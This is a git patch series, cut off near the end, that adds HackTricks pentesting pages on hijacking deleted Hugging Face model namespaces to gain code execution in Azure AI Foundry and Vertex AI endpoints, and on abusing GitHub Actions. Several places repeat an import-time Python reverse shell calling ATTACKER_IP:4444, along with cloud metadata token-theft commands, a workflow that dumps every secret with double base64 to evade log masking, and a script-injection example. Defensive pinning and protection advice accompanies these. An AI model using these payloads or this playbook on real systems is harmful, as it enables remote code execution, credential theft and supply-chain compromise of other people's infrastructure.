From 5b5e339f96ea5cabed3edb4dfa4103ccdf89e142 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 4 Sep 2025 13:00:46 +0000 Subject: [PATCH 1/4] Add content from: Model Namespace Reuse: An AI Supply-Chain Attack Exploiting ... - Remove searchindex.js (auto-generated file) --- src/SUMMARY.md | 2 + .../az-post-exploitation/README.md | 4 + .../az-azure-ai-foundry-post-exploitation.md | 104 +++++++++++++++ .../gcp-post-exploitation/README.md | 4 + .../gcp-vertex-ai-post-exploitation.md | 123 ++++++++++++++++++ .../pentesting-cloud-methodology.md | 75 +++++++++++ 6 files changed, 312 insertions(+) create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1cedf0205..7d93f52b0 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -96,6 +96,7 @@ - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md) - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) @@ -461,6 +462,7 @@ - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md) - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md) - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + - [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 234962b1c..52b7c1b91 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +az-azure-ai-foundry-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md new file mode 100644 index 000000000..959e01d3b --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md @@ -0,0 +1,104 @@ +# Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment. +- HF model identifiers are Author/ModelName. If an HF author/org is deleted, anyone can re-register that author and publish a model with the same ModelName at the legacy path. +- Pipelines and catalogs that pull by name only (no commit pinning/integrity) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, granting RCE with that endpoint’s permissions. + +Common HF takeover cases: +- Ownership deletion: Old path 404 until takeover. +- Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +```bash +# Check author/org existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Check model path +curl -I https://huggingface.co// +# 307 -> redirect (transfer case), 404 -> deleted until takeover +``` + +## End-to-end Attack Flow against Azure AI Foundry + +1) In the Model Catalog, find HF models whose original authors were deleted or transferred (old author removed) on HF. +2) Re-register the abandoned author on HF and recreate the ModelName. +3) Publish a malicious repo with loader code that executes on import or requires trust_remote_code=True. +4) Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; loader executes inside the Azure endpoint container/VM, yielding RCE with endpoint permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # or powershell on Windows images + +if os.environ.get("AZUREML_ENDPOINT","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- AI Foundry deployments that integrate HF typically clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some paths require trust_remote_code=True. +- Access usually matches the endpoint’s managed identity/service principal permissions. Treat it as an initial access foothold for data access and lateral movement within Azure. + +## Post-Exploitation Tips (Azure Endpoint) + +- Enumerate environment variables and MSI endpoints for tokens: + +```bash +# Azure Instance Metadata Service (inside Azure compute) +curl -H "Metadata: true" \ + "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" +``` + +- Check mounted storage, model artifacts, and reachable Azure services with the acquired token. +- Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF. + +## Defensive Guidance for Azure AI Foundry Users + +- Pin models by commit when loading from HF: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models to a trusted internal registry and deploy from there. +- Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName that are deleted/transferred; update or pin. +- Validate author existence and model provenance prior to deployment. + +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index e24133696..8f4597e1a 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +gcp-vertex-ai-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md new file mode 100644 index 000000000..b43cf5669 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md @@ -0,0 +1,123 @@ +# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Vertex AI Model Garden allows direct deployment of many Hugging Face (HF) models. +- HF model identifiers are Author/ModelName. If an author/org on HF is deleted, the same author name can be re-registered by anyone. Attackers can then create a repo with the same ModelName at the legacy path. +- Pipelines, SDKs, or cloud catalogs that fetch by name only (no pinning/integrity) will pull the attacker-controlled repo. When the model is deployed, loader code from that repo can execute inside the Vertex AI endpoint container, yielding RCE with the endpoint’s permissions. + +Two common takeover cases on HF: +- Ownership deletion: Old path 404 until someone re-registers the author and publishes the same ModelName. +- Ownership transfer: HF issues 307 redirects from old Author/ModelName to the new author. If the old author is later deleted and re-registered by an attacker, the redirect chain is broken and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +- Old author deleted: the page for the author returns 404; model path may return 404 until takeover. +- Transferred models: the old model path issues 307 to the new owner while the old author exists. If the old author is later deleted and re-registered, the legacy path will resolve to the attacker’s repo. + +Quick checks with curl: + +```bash +# Check author/org existence +curl -I https://huggingface.co/ +# 200 = exists, 404 = deleted/available + +# Check old model path behavior +curl -I https://huggingface.co// +# 307 = redirect to new owner (transfer case) +# 404 = missing (deletion case) until someone re-registers +``` + +## End-to-end Attack Flow against Vertex AI + +1) Discover reusable model namespaces that Model Garden lists as deployable: +- Find HF models in Vertex AI Model Garden that still show as “verified deployable”. +- Verify on HF if the original author is deleted or if the model was transferred and the old author was later removed. + +2) Re-register the deleted author on HF and recreate the same ModelName. + +3) Publish a malicious repo. Include code that executes on model load. Examples that commonly execute during HF model load: +- Side effects in __init__.py of the repo +- Custom modeling_*.py or processing code referenced by config/auto_map +- Code paths that require trust_remote_code=True in Transformers pipelines + +4) A Vertex AI deployment of the legacy Author/ModelName now pulls the attacker repo. The loader executes inside the Vertex AI endpoint container. + +5) Payload establishes access from the endpoint environment (RCE) with the endpoint’s permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# Place in __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # Or python -c exec ... + +if os.environ.get("VTX_AI","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- Real-world loaders vary. Many Vertex AI HF integrations clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some uses require trust_remote_code=True. +- The endpoint typically runs in a dedicated container with limited scope, but it is a valid initial foothold for data access and lateral movement in GCP. + +## Post-Exploitation Tips (Vertex AI Endpoint) + +Once code is running inside the endpoint container, consider: +- Enumerating environment variables and metadata for credentials/tokens +- Accessing attached storage or mounted model artifacts +- Interacting with Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.) +- Persistence in the model artifact if the platform re-pulls the repo + +Enumerate instance metadata if accessible (container dependent): + +```bash +curl -H "Metadata-Flavor: Google" \ + http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token +``` + +## Defensive Guidance for Vertex AI Users + +- Pin models by commit in HF loaders to prevent silent replacement: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models into a trusted internal artifact store/registry and deploy from there. +- Continuously scan codebases and configs for hard-coded Author/ModelName that are deleted/transferred; update to new namespaces or pin by commit. +- In Model Garden, verify model provenance and author existence before deployment. + +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index d3eb7a659..ea387a405 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -420,6 +420,75 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) +## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse) + +A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker. + +Key cases on Hugging Face hub: +- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model. +- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content. + +Recognition heuristics (HTTP): + +```bash +# Author existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Legacy model path behavior +curl -I https://huggingface.co// # 307 redirect (transfer) | 404 deleted until takeover +``` + +Exploitation playbook (abstract): +1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs. +2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author. +3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True. +4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attacker’s code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoint’s permissions. + +Payload on load (example): + +```python +# __init__.py or a module imported by model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # demo purposes only + +# Gate on an env var if desired +if os.environ.get("INFERENCE_ENDPOINT","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Cloud platform impact and examples: +- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code. + +{{#ref}} +gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md +{{#endref}} + +- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoint’s permissions. + +{{#ref}} +azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md +{{#endref}} + +Detection and hardening: +- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership. +- Pin to a specific commit in loaders to prevent silent replacement: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Clone vetted models to trusted internal registries/artifact stores and reference those in production. +- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered. + ## Google ### GCP @@ -454,6 +523,12 @@ azure-security/ You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) +- [Transformers docs: Security and remote code](https://huggingface.co/docs/transformers/installation#security-and-remote-code) + {{#include ../banners/hacktricks-training.md}} From b9b20e45671ceda3402ac3fada6d9665cee0a55d Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 9 Sep 2025 01:35:49 +0000 Subject: [PATCH 2/4] Add content from: GitHub Actions: A Cloudy Day for Security - Part 1 - Remove searchindex.js (auto-generated file) --- .../abusing-github-actions/README.md | 31 ++++++ .../gh-actions-context-script-injections.md | 99 +++++++++++++++++++ .../basic-github-information.md | 25 ++++- 3 files changed, 152 insertions(+), 3 deletions(-) diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index dd0f94cc4..c3291afbf 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -173,6 +173,9 @@ In case members of an organization can **create new repos** and you can execute If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). +> [!WARNING] +> Any restriction implemented only inside workflow YAML (for example, `on: push: branches: [main]`, job conditionals, or manual gates) can be edited by collaborators. Without external enforcement (branch protections, protected environments, and protected tags), a contributor can retarget a workflow to run on their branch and abuse mounted secrets/permissions. + You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): ```yaml @@ -567,6 +570,30 @@ jobs: key: ${{ secrets.PUBLISH_KEY }} ``` +- Enumerate all secrets via the secrets context (collaborator level). A contributor with write access can modify a workflow on any branch to dump all repository/org/environment secrets. Use double base64 to evade GitHub’s log masking and decode locally: + + ```yaml + name: Steal secrets + on: + push: + branches: [ attacker-branch ] + jobs: + dump: + runs-on: ubuntu-latest + steps: + - name: Double-base64 the secrets context + run: | + echo '${{ toJson(secrets) }}' | base64 -w0 | base64 -w0 + ``` + + Decode locally: + + ```bash + echo "ZXdv...Zz09" | base64 -d | base64 -d + ``` + + Tip: for stealth during testing, encrypt before printing (openssl is preinstalled on GitHub-hosted runners). + ### Abusing Self-hosted runners The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml. @@ -650,6 +677,10 @@ An organization in GitHub is very proactive in reporting accounts to GitHub. All > [!WARNING] > The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. +## References + +- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1) + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md index d9d11a81b..07c773cd7 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md @@ -2,4 +2,103 @@ {{#include ../../../banners/hacktricks-training.md}} +## Understanding the risk +GitHub Actions renders expressions ${{ ... }} before the step executes. The rendered value is pasted into the step’s program (for run steps, a shell script). If you interpolate untrusted input directly inside run:, the attacker controls part of the shell program and can execute arbitrary commands. + +Docs: https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions and contexts/functions: https://docs.github.com/en/actions/learn-github-actions/contexts + +Key points: +- Rendering happens before execution. The run script is generated with all expressions resolved, then executed by the shell. +- Many contexts contain user-controlled fields depending on the triggering event (issues, PRs, comments, discussions, forks, stars, etc.). See the untrusted input reference: https://securitylab.github.com/resources/github-actions-untrusted-input/ +- Shell quoting inside run: is not a reliable defense, because the injection occurs at the template rendering stage. Attackers can break out of quotes or inject operators via crafted input. + +## Vulnerable pattern → RCE on runner + +Vulnerable workflow (triggered when someone opens a new issue): + +```yaml +name: New Issue Created +on: + issues: + types: [opened] +jobs: + deploy: + runs-on: ubuntu-latest + permissions: + issues: write + steps: + - name: New issue + run: | + echo "New issue ${{ github.event.issue.title }} created" + - name: Add "new" label to issue + uses: actions-ecosystem/action-add-labels@v1 + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + labels: new +``` + +If an attacker opens an issue titled $(id), the rendered step becomes: + +```sh +echo "New issue $(id) created" +``` + +The command substitution runs id on the runner. Example output: + +``` +New issue uid=1001(runner) gid=118(docker) groups=118(docker),4(adm),100(users),999(systemd-journal) created +``` + +Why quoting doesn’t save you: +- Expressions are rendered first, then the resulting script runs. If the untrusted value contains $(...), `;`, `"`/`'`, or newlines, it can alter the program structure despite your quoting. + +## Safe pattern (shell variables via env) + +Correct mitigation: copy untrusted input into an environment variable, then use native shell expansion ($VAR) in the run script. Do not re-embed with ${{ ... }} inside the command. + +```yaml +# safe +jobs: + deploy: + runs-on: ubuntu-latest + steps: + - name: New issue + env: + TITLE: ${{ github.event.issue.title }} + run: | + echo "New issue $TITLE created" +``` + +Notes: +- Avoid using ${{ env.TITLE }} inside run:. That reintroduces template rendering back into the command and brings the same injection risk. +- Prefer passing untrusted inputs via env: mapping and reference them with $VAR in run:. + +## Reader-triggerable surfaces (treat as untrusted) + +Accounts with only read permission on public repositories can still trigger many events. Any field in contexts derived from these events must be considered attacker-controlled unless proven otherwise. Examples: +- issues, issue_comment +- discussion, discussion_comment (orgs can restrict discussions) +- pull_request, pull_request_review, pull_request_review_comment +- pull_request_target (dangerous if misused, runs in base repo context) +- fork (anyone can fork public repos) +- watch (starring a repo) +- Indirectly via workflow_run/workflow_call chains + +Which specific fields are attacker-controlled is event-specific. Consult GitHub Security Lab’s untrusted input guide: https://securitylab.github.com/resources/github-actions-untrusted-input/ + +## Practical tips + +- Minimize use of expressions inside run:. Prefer env: mapping + $VAR. +- If you must transform input, do it in the shell using safe tools (printf %q, jq -r, etc.), still starting from a shell variable. +- Be extra careful when interpolating branch names, PR titles, usernames, labels, discussion titles, and PR head refs into scripts, command-line flags, or file paths. +- For reusable workflows and composite actions, apply the same pattern: map to env then reference $VAR. + +## References + +- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1) +- [GitHub workflow syntax](https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions) +- [Contexts and expression syntax](https://docs.github.com/en/actions/learn-github-actions/contexts) +- [Untrusted input reference for GitHub Actions](https://securitylab.github.com/resources/github-actions-untrusted-input/) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md index 94bca00a9..bd4480332 100644 --- a/src/pentesting-ci-cd/github-security/basic-github-information.md +++ b/src/pentesting-ci-cd/github-security/basic-github-information.md @@ -190,8 +190,12 @@ jobs: ``` You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\ -It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. +Additionally, environment protections include: +- **Required reviewers**: gate jobs targeting the environment until approved. Enable **Prevent self-review** to enforce a proper four‑eyes principle on the approval itself. +- **Deployment branches and tags**: restrict which branches/tags may deploy to the environment. Prefer selecting specific branches/tags and ensure those branches are protected. Note: the "Protected branches only" option applies to classic branch protections and may not behave as expected if using rulesets. +- **Wait timer**: delay deployments for a configurable period. +It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. ### Git Action Runner A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. @@ -231,10 +235,11 @@ Different protections can be applied to a branch (like to master): - You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. + - **Require approval of the most recent reviewable push**. Ensures that any new commits after an approval (including pushes by other collaborators) re-trigger review so an attacker cannot push post-approval changes and merge. - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. -- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). +- **Require status checks to pass before merging.** Some checks need to pass before being able to merge the commit (like a GitHub App reporting SAST results). Tip: bind required checks to a specific GitHub App; otherwise any app could spoof the check via the Checks API, and many bots accept skip directives (e.g., "@bot-name skip"). - **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. - **Require signed commits**. The commits need to be signed. - **Require linear history.** Prevent merge commits from being pushed to matching branches. @@ -244,6 +249,16 @@ Different protections can be applied to a branch (like to master): > [!NOTE] > As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +## Tag Protections + +Tags (like latest, stable) are mutable by default. To enforce a four‑eyes flow on tag updates, protect tags and chain protections through environments and branches: + +1) On the tag protection rule, enable **Require deployments to succeed** and require a successful deployment to a protected environment (e.g., prod). +2) In the target environment, restrict **Deployment branches and tags** to the release branch (e.g., main) and optionally configure **Required reviewers** with **Prevent self-review**. +3) On the release branch, configure branch protections to **Require a pull request**, set approvals ≥ 1, and enable both **Dismiss approvals when new commits are pushed** and **Require approval of the most recent reviewable push**. + +This chain prevents a single collaborator from retagging or force-publishing releases by editing workflow YAML, since deployment gates are enforced outside of workflows. + ## References - [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) @@ -251,8 +266,12 @@ Different protections can be applied to a branch (like to master): - [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github) - [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards) - [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) +- [https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions](https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions) +- [https://securitylab.github.com/resources/github-actions-untrusted-input/](https://securitylab.github.com/resources/github-actions-untrusted-input/) +- [https://docs.github.com/en/rest/checks/runs](https://docs.github.com/en/rest/checks/runs) +- [https://docs.github.com/en/apps](https://docs.github.com/en/apps) +- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1) {{#include ../../banners/hacktricks-training.md}} - From 89a2ab54aef02763e22ed26ea8949e2070dda753 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 29 Sep 2025 23:03:04 +0200 Subject: [PATCH 3/4] Update pentesting-cloud-methodology.md --- .../pentesting-cloud-methodology.md | 69 ------------------- 1 file changed, 69 deletions(-) diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index ea387a405..41fce1f4c 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -420,75 +420,6 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) -## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse) - -A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker. - -Key cases on Hugging Face hub: -- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model. -- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content. - -Recognition heuristics (HTTP): - -```bash -# Author existence -curl -I https://huggingface.co/ # 200 exists, 404 deleted/available - -# Legacy model path behavior -curl -I https://huggingface.co// # 307 redirect (transfer) | 404 deleted until takeover -``` - -Exploitation playbook (abstract): -1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs. -2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author. -3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True. -4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attacker’s code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoint’s permissions. - -Payload on load (example): - -```python -# __init__.py or a module imported by model loader -import os, socket, subprocess, threading - -def _rs(host, port): - s = socket.socket(); s.connect((host, port)) - for fd in (0,1,2): - try: - os.dup2(s.fileno(), fd) - except Exception: - pass - subprocess.call(["/bin/sh","-i"]) # demo purposes only - -# Gate on an env var if desired -if os.environ.get("INFERENCE_ENDPOINT","1") == "1": - threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() -``` - -Cloud platform impact and examples: -- Google Vertex 